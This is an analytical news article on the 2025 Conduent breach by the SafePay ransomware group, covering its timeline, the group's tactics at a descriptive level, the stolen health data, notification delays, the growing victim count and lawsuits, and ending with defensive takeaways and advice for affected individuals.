A ransomware group that barely existed twelve months ago spent nearly three months moving freely through the systems of one of America's most critical government contractors, stealing 8.5 terabytes of healthcare and social services data while state agencies reported nothing more than "service disruptions." The full scale of the Conduent breach is only now becoming clear — and at 25 million confirmed victims and rising, it is among the largest healthcare data breaches ever recorded in the United States, and likely the largest of 2025. For comparison, the Change Healthcare ransomware attack of February 2024 ultimately affected 193 million people; Conduent's breach may not reach that scale, but it has already surpassed every comparable incident in recent memory outside that singular event.
When Wisconsin's Department of Children and Families reported disruptions to its child support payment systems in January 2025, and Oklahoma's Human Services agency reported similar outages, neither could have known those disruptions were the first visible signal of a breach that had already been underway for nearly three months. By the time Conduent Business Services traced the source, an unknown attacker had already finished what they came to do: exfiltrate some of the most sensitive data the U.S. government entrusts to a private company, at enormous scale, then walk out.
This is not a story about a sophisticated zero-day attack or a novel technique. It is a story about dwell time, inadequate detection, third-party risk concentration, and a notification process so delayed it may itself constitute a legal violation. It is also a story about a ransomware group that appeared from nowhere in late 2024 and immediately became one of the most operationally aggressive in the world.
Who Is Conduent and Why It Matters
Conduent Business Services, headquartered in Florham Park, New Jersey, is not a household name. That's precisely the problem. The company was spun off from Xerox Corporation in 2017 and has since grown into a critical component of American public infrastructure through a role so embedded that few outside government procurement would recognize it. It provides technology-enabled back-office services including medical billing, Medicaid administration, child support payment systems, toll collection, food assistance programs, and document processing to government agencies and healthcare organizations across the country.
The numbers tell the story. Conduent manages technology and payment systems for 46 U.S. states. It processes approximately $85 billion in annual disbursements. It handles over 2 billion customer service interactions each year. By its own estimate, the company supports roughly 100 million U.S. residents through various government health and welfare programs. It serves nearly half of the Fortune 100 and more than 600 government and transportation agencies globally.
Its client list in the healthcare sector includes Humana, Blue Cross Blue Shield of Texas, Blue Cross Blue Shield of Montana, Blue Cross and Blue Shield of Illinois, and Premera Blue Cross. Its government clients include state Medicaid agencies, child support programs, food assistance systems, and unemployment insurance operations. Conduent is, in the language of data privacy law, a business associate under HIPAA — meaning every healthcare client that trusts it with patient records has a legal obligation to ensure Conduent is protecting that data to the standard required by federal law.
Conduent exemplifies a structural vulnerability in U.S. public infrastructure: the outsourcing of critical government data to private vendors creates single points of failure that, when compromised, expose data from dozens of agencies and millions of beneficiaries simultaneously. No individual state or healthcare client could have prevented this breach by improving their own security posture.
The Attack Timeline
The chronology of the Conduent breach is, by itself, damning.
What this timeline reveals is a 16-month span between the initial compromise and the completion of victim notifications. It reveals an 84-day dwell time during which an attacker moved through a network holding some of the most sensitive health and social services data in the country, undetected. It reveals a nine-month gap between detecting a breach and telling the people whose data was stolen.
Who Is SafePay?
The Conduent breach introduced many security professionals to SafePay, a ransomware group that had been operating for barely two months at the time of the intrusion. Understanding who they are matters, because the breach at Conduent represents SafePay's first confirmed major strike against a U.S. technology firm — and the group has moved fast since then.
SafePay's first confirmed activity dates to September 2024. Its data leak site appeared in November 2024. By May 2025, it had become the single most active ransomware operation globally by victim count. By mid-2025 it had claimed over 200 victims in a single quarter. This is not a group that slowly built its capabilities. It arrived operationally mature.
"Establishing itself as one of the most operationally efficient ransomware groups despite its recent emergence, SafePay demonstrates technical capabilities and an immediate high-volume operational tempo suggesting involvement of experienced threat actors rather than genuine newcomers." — Halcyon Threat Intelligence
Security researchers have traced SafePay's ransomware binary to the leaked LockBit 3.0 source code, which was made publicly available in late 2022. However, this is not a simple copy-paste operation. Forensic analysis by Huntress, Bitdefender, and Acronis has identified meaningful divergences from LockBit's implementation. While both groups use the ChaCha20 encryption algorithm, SafePay generates a unique symmetric key for each encrypted file and embeds a master key within the ransomware itself — a structural difference from LockBit's shared key management approach. The group has also incorporated techniques observed in ALPHV/BlackCat and INC Ransom operations, suggesting access to a broad pool of ransomware knowledge.
What makes SafePay operationally distinctive is its organizational model. Unlike the Ransomware-as-a-Service (RaaS) structure used by LockBit, ALPHV, and RansomHub — where operators sell or lease access to their ransomware to affiliates who conduct the actual attacks — SafePay operates as a closed, centralized group. It conducts all attacks itself, manages all infrastructure internally, and retains all revenue. This model eliminates the affiliate risk that led to the downfall of LockBit (where an affiliate leaked internal data in retaliation for a payment dispute) and provides tighter operational security. It is harder to infiltrate, harder to turn informants against, and harder to disrupt through the kind of affiliate recruitment stings that law enforcement has used against RaaS groups.
SafePay's attack methodology is characterized by speed. Once inside a network, the group consistently achieves full encryption within 24 hours. Its initial access vectors include credential brute-forcing, exploitation of exposed RDP instances, VPN appliance vulnerabilities — particularly misconfigured Fortinet firewalls — and compromised credentials obtained from initial access brokers. For lateral movement, it deploys ShareFinder.ps1 to enumerate network shares, uses PsExec, and leverages living-off-the-land binaries (LOLBins) to avoid detection. Before deploying the encryptor, it uses FileZilla and Rclone to exfiltrate data, and then deletes Volume Shadow Copies to prevent recovery.
One behavioral detail is telling: SafePay's ransomware checks for Cyrillic keyboard layouts on targeted systems and refuses to execute if Cyrillic is enabled. This is a kill switch commonly used by ransomware groups that want to avoid targeting systems in Russia or CIS countries — a practice associated either with operators based in those regions, or with those deliberately signaling deference to Russian-speaking threat actor communities. The geographic origin of SafePay remains unconfirmed.
- Ransomware base: LockBit 3.0 leaked source code with significant modifications
- Encryption: ChaCha20 with unique per-file symmetric keys
- Initial access: RDP brute force, VPN exploitation, credential brokers, Fortinet misconfigurations
- Lateral movement: ShareFinder.ps1, PsExec, LOLBins, RMM tools
- Exfiltration tools: FileZilla, Rclone, WinRAR
- Kill switch: Cyrillic keyboard layout detection — aborts execution if found
- Model: Closed, centralized operation — no affiliates, no RaaS
The timing of SafePay's emergence in September 2024 is significant. Operation Cronos, the coordinated law enforcement takedown of LockBit's infrastructure, concluded in early 2024. ALPHV shut down shortly afterward. The resulting vacuum in the ransomware ecosystem created an opportunity for experienced operators to establish new, independent groups. SafePay's immediate operational maturity — evidenced by its ability to publish 23 victims in a single day by November 2024, a volume that rivals top-tier RaaS operations — strongly suggests its core membership includes veteran ransomware operators, not newcomers learning the trade. Conduent appears to have been targeted during this initial surge, before SafePay had attracted meaningful public attention from the security community.
What Was Stolen
The files exfiltrated from Conduent's network contain information that, in data breach terms, represents a complete identity theft package. According to breach notifications filed with multiple state attorneys general, the stolen data includes full names, home addresses, dates of birth, Social Security numbers, medical treatment information, health insurance details, and claims data.
This combination is worth pausing on. Social Security numbers are the skeleton key of American identity verification: they are used for credit applications, tax filings, government benefit claims, and identity verification across virtually every financial institution in the country. Medical records carry HIPAA protection precisely because their misuse can lead to insurance fraud, prescription drug scams, and targeted extortion. Health insurance details enable fraudulent claims, false billing, and impersonation within healthcare systems. Combined with addresses and dates of birth, this data enables identity theft across every domain simultaneously — financial, medical, governmental, and personal.
The scale of the exfiltration — 8.5 terabytes — is among the largest documented in a single ransomware incident. Conduent has stated that its forensic investigators have found no evidence the data has been published online or sold on dark web marketplaces. This claim is worth treating with skepticism, not because it is necessarily false, but because the absence of Conduent from the SafePay leak site is itself an ambiguous signal. Ransomware groups typically remove victims from their sites when a ransom is paid, when data is sold, or when a negotiated settlement is reached. Conduent has not confirmed whether any ransom was paid.
SafePay claims to have stolen all 8.5 terabytes. The SafePay data leak site no longer lists Conduent. The stolen data has not surfaced publicly. The company has set aside $25 million to cover notification costs, credit monitoring, and identity protection services under an agreement with its clients. Its cyber insurance policy covers any costs that exceed this amount. These facts are consistent with multiple outcomes — including, but not limited to, a ransom payment.
One note on attribution: while SafePay publicly claimed responsibility and was identified on its leak site, Conduent has not formally confirmed the group's identity. HIPAA Journal and other sources have noted that ransomware groups occasionally fabricate or exaggerate claims against high-profile targets. The available evidence — leak site listing, claimed data volume, timing, and subsequent removal — is consistent with a genuine SafePay attack, but the exact technical attribution has not been independently verified by law enforcement at the time of publication.
"Working in conjunction with our clients, we expect to send out all of the consumer notifications by April 15. In addition, a dedicated call center has been set up to address consumer inquiries." — Conduent statement to Fox Business, February 2026
The Notification Failure
Of all the failures documented in the Conduent breach, the notification delay is the one with the clearest legal and ethical implications. Conduent detected the intrusion on January 13, 2025. Affected individuals did not begin receiving notification letters until October 2025. That is a gap of approximately nine months between knowing that patients' Social Security numbers, medical records, and health insurance data had been stolen, and telling those patients. Investors, by contrast, received formal disclosure via SEC Form 8-K on April 14, 2025 — five months before the first victim notification was sent.
HIPAA requires covered entities and their business associates to notify affected individuals within 60 days of discovering a breach. State breach notification laws have varying timelines, but most require notification within 30 to 90 days. A nine-month delay is not a minor deviation from these requirements. It is a near-complete disregard for them.
The practical harm of the delay is significant. During the nine months between detection and notification, affected individuals had no way to take protective action. They could not place credit freezes in response to a breach they did not know had occurred. They could not monitor their insurance explanations of benefits for fraudulent claims. They could not enroll in credit monitoring. They were exposed, uninformed, and unprotected, while Conduent conducted its investigation and prepared its notifications.
HIPAA mandates breach notification within 60 days of discovery for covered entities and their business associates. Conduent's notification process began approximately 270 days after discovery. Multiple affected healthcare clients — including Blue Cross Blue Shield of Texas, Blue Cross Blue Shield of Montana, and Premera Blue Cross — also delayed notifications, in some cases until October 2025. Both the covered entities and their business associate face potential regulatory action from the HHS Office for Civil Rights.
Several of Conduent's healthcare clients followed a similar pattern. Blue Cross Blue Shield of Montana, Blue Cross and Blue Shield of Texas, and Premera Blue Cross did not notify affected individuals until on or around October 2025, according to breach attorneys investigating the case. The Wisconsin Department of Children and Families and Oklahoma Human Services notified affected individuals of service disruptions in January 2025 — the same month the breach was discovered — though these were operational outage notices, not full data breach notifications. The complete scope of the data theft was not known in January. This disparity suggests that some clients acted on their notification obligations promptly while others did not.
The Victim Count That Won't Stop Growing
The victim count in the Conduent breach has followed an unusual trajectory: it has grown by an order of magnitude from the first estimates and shows no signs of being final.
When Conduent filed its initial breach reports with state attorneys general in October 2025, it estimated that approximately 4 million Texans were affected, with total U.S. victims at roughly 10.5 million based on the Oregon Department of Justice's filing. That figure was already enough to rank the incident among the ten largest healthcare data breaches ever recorded in the United States — and at the time, it ranked behind only the Aflac supplemental insurance breach, which affected 22.7 million people and had been the largest confirmed health data breach of 2025 until Conduent's numbers overtook it. Then the counting continued.
Texas updated its figures. The initial 4 million estimate grew to nearly 14.8 million, then to 15.4 million, and most recently to 15,494,592 — a number representing more than half of Texas's entire population. Oregon maintained its figure of approximately 10.5 million, though the overlap with Texas is unclear. Breach reports to additional state attorneys general in Delaware, Massachusetts, California, Indiana, Maine, New Hampshire, and Vermont added hundreds of thousands more. Corporate clients like Volvo Group North America added tens of thousands of employees. Total confirmed victims now exceed 25 million.
The reason for the dramatic revision is worth understanding. When Conduent filed its initial breach reports, the data review was still in progress. Forensic investigators were still working through the 8.5 terabytes of exfiltrated data, matching records to individuals, clients, and affected programs. What appeared at first to be approximately 4 million Texans turned out to be four times that number. The scale of the breach, and the complexity of Conduent's role as an intermediary holding data on behalf of dozens of clients serving millions of beneficiaries, made the victim count genuinely difficult to establish in real time.
That explanation does not fully account for the nine-month notification delay, but it does illustrate why the victim count in breaches of this type often grows significantly after initial disclosures. The first number is rarely the final number.
Legal and Regulatory Fallout
The legal response to the Conduent breach has been swift and broad. At least ten federal class action lawsuits have been filed in the U.S. District Court for the District of New Jersey, consolidated under Judge Michael A. Hammer, who appointed an eight-member Plaintiffs' Steering Committee in December 2025 to coordinate the litigation. The lawsuits advance several theories of liability.
The negligence claims center on Conduent's alleged failure to implement adequate cybersecurity safeguards for the sensitivity of the data it handled. As a HIPAA business associate, Conduent had a legal obligation to implement administrative, physical, and technical safeguards sufficient to protect protected health information. Plaintiffs argue that a company entrusted with the Social Security numbers and medical records of 25 million Americans, processing $85 billion in annual disbursements, should have been able to detect an intrusion within days, not months.
The negligence per se theory relies on the HIPAA violation itself as the basis for civil liability. The breach of third-party beneficiary contract claims assert that individuals whose data Conduent held were intended beneficiaries of the security obligations in Conduent's contracts with healthcare and government clients. Plaintiffs are seeking compensatory, statutory, and punitive damages, as well as injunctive relief requiring Conduent to implement enhanced security measures.
"The Conduent data breach was likely the largest breach in U.S. history. If any insurance giant cut corners or has information that could help us prevent breaches like this in the future, I will work to uncover it." — Texas Attorney General Ken Paxton
Texas Attorney General Ken Paxton announced a formal investigation into both Conduent and Blue Cross Blue Shield of Texas. The Texas AG's office is seeking documentation on Conduent's security policies, practices, and protocols, and has separately requested evidence from BCBSTX to determine whether it complied with Texas law in its handling of the breach and subsequent notification. Additional investigations by the U.S. Department of Health and Human Services Office for Civil Rights (HHS OCR) are expected, though the OCR's breach portal had not been updated as of late 2025 due to an administrative lapse.
Conduent has committed $25 million under its notification agreement with clients to cover the costs of identifying affected individuals, issuing breach notifications, and providing credit monitoring, dark web monitoring, and identity restoration services. SEC filings indicate that approximately $9 million of that amount had been disbursed by September 2025, with the remaining $16 million expected to be paid out by early 2026. The company's cyber insurance policy covers any costs that exceed the $25 million threshold, within policy limits. Affected individuals have until March 31, 2026, to enroll in the free two-year credit monitoring service Conduent is offering — a deadline that is not negotiable. Accepting free credit monitoring does not waive the right to participate in class action litigation or receive future settlements.
Key Takeaways and Defense
- Dwell time is the number that matters. Eighty-four days of undetected access is not a failure of perimeter security alone — it is a failure of detection. Modern threat actors do not rely on quick smash-and-grab attacks. They establish persistence, conduct reconnaissance, and move laterally before triggering any alarm. Organizations that rely on perimeter controls without robust network monitoring, anomaly detection, and behavioral analytics will consistently fail to detect attackers who have already bypassed the perimeter. For a company of Conduent's scale, handling data of this sensitivity, three months of undetected lateral movement represents a fundamental detection gap.
- Third-party risk is first-party risk. Every healthcare organization and government agency that contracted with Conduent owned a portion of this breach risk, even if they had nothing to do with Conduent's security failures. Third-party risk management cannot be limited to a vendor questionnaire completed at contract signing. It requires ongoing verification that business associates holding sensitive data are maintaining the security posture they claimed to have when the contract was signed. HIPAA's business associate agreement requirements exist precisely to create shared accountability. That accountability failed here at every level.
- Notification delays cause real harm. The nine-month gap between breach discovery and victim notification was not simply a compliance failure. During those nine months, 25 million people whose Social Security numbers had been stolen could not take the basic step of placing a credit freeze. They could not monitor their insurance for fraudulent claims. They were exposed. Every day of delay in breach notification is a day of increased risk for affected individuals. HIPAA's 60-day timeline exists because of this reality. Organizations that treat notification as an optional final step after a breach, rather than an urgent obligation, should expect both regulatory action and civil liability.
- New ransomware groups can be immediately dangerous. SafePay appeared in September 2024 and hit Conduent within two months of its first known activity. The group's immediate operational sophistication — its closed structure, rapid deployment capability, and volume of victims in its first weeks — challenges the assumption that new threat actors need time to mature before they become serious threats. Organizations cannot assume that an unknown group is unsophisticated simply because they have not heard of it.
- Double extortion changes the calculus. SafePay exfiltrated the data before deploying any encryptor. This sequence, now standard across advanced ransomware operations, means that restoring from backup does not resolve the incident. The data is still gone. The extortion threat remains valid whether or not the victim can recover their systems. Defenses that focus on backup integrity and recovery speed, while important, do not address the exfiltration half of double extortion. Data loss prevention controls, egress monitoring, and segmentation that limits how much data can leave a network in any given period all become essential components of a complete ransomware defense strategy.
- Exposed RDP and VPN are still the primary gates. SafePay's documented initial access methods — RDP brute force, VPN exploitation, compromised credentials — are not novel. They are the same vectors that have driven the majority of ransomware intrusions for the past five years. If your organization has exposed RDP instances, unpatched VPN appliances, or does not enforce multi-factor authentication across all remote access paths, you are not defended against the threat class that hit Conduent. These are not advanced techniques requiring sophisticated countermeasures. They are basic hygiene failures.
Conduent is offering two years of free credit monitoring and identity restoration through a third-party provider. Enrollment deadline is March 31, 2026. Enrolling does not waive your right to join any class action lawsuit or receive future settlement compensation. Independent of any Conduent offering, you should also:
- Place a credit freeze at all three major bureaus (Equifax, Experian, TransUnion) — this is free and prevents new credit from being opened in your name
- Review your insurance Explanation of Benefits (EOB) statements for procedures or prescriptions you did not receive
- Monitor bank and credit accounts for unauthorized transactions
- Be highly alert to phishing attempts using your name, insurer's name, or government program details — attackers with this dataset can craft convincing impersonation messages
- Check your Social Security Administration account at ssa.gov for unauthorized changes to your benefits or employment history
HIPAA Journal — Texas Attorney General Launches Investigation into Conduent Data Breach
SecurityWeek — 10 Million Impacted by Conduent Data Breach
SecurityWeek — Conduent Breach Hits Volvo Group
Malwarebytes — Ransomware Gang Claims Conduent Breach
TechRepublic — From 10M to 25M: Conduent Breach Balloons
IDStrong — Conduent Data Breach 2025–2026
Top Class Actions — Conduent Litigation Overview
Bitdefender — SafePay Ransomware: TTPs
Halcyon — SafePay Threat Group Profile
SC World — SafePay Ransomware: LockBit Builder
Picus Security — Inside SafePay: Analyzing the New Centralized Ransomware Group
GBHackers — SafePay Ransomware Hits 73 Organizations in One Month
The Conduent breach is not a story about an unstoppable attacker. SafePay used credential-based initial access, exploited a detection gap, and then exfiltrated data at a pace and volume that should have triggered alarm. The fact that it did not — for 84 days, across a network belonging to a company that holds sensitive data for 100 million Americans — is the story. The breach was not inevitable. The nine-month notification delay was not inevitable. The victim count was not inevitable. What was inevitable, given the documented absence of adequate detection and response capability, was that eventually someone would walk in and take what they wanted. SafePay was simply the group that arrived first.